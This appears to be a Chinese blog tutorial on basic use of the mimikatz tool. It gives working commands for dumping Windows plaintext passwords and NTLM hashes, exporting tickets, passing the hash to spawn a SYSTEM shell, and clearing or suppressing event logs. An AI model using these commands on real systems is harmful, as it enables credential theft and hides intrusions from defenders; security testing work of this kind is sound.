• 欢迎访问本站网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏吧

Windows密码抓取安全测试工具mimikatz基本使用

网络安全 admin 9个月前 (11-01) 501次浏览 已收录 0个评论 扫描二维码

基本

mimikatz有两种版本:x64Win32,具体取决于您的Windows版本(32/64位)。

Windows密码抓取安全测试工具mimikatz基本使用

mimikatz使用时需要高权限,至少是administrator权限
mimikatz抓取密码的命令需要system权限,可以先进行提权

运行mimikatz

Windows密码抓取安全测试工具mimikatz基本使用

提升权限(从administrator提升到system)

privilege::debug

抓取明文hash密码

获取当前在线用户的明文密码(需要高权限运行)

sekurlsa::logonpasswords

Windows密码抓取安全测试工具mimikatz基本使用

获取当前此计算机存在过用户的NTLMHASH

lsadump::lsa /patch 

mimikatz其他命令

sekurlsa::tickets /export
log    输出运行日志
event::clear   清除事件日志
event::drop    以后登录不记录日志

运行system权限的cmd

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd  

本站的文章和资源来自互联网或者站长的原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:Windows密码抓取安全测试工具mimikatz基本使用
喜欢 (4)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址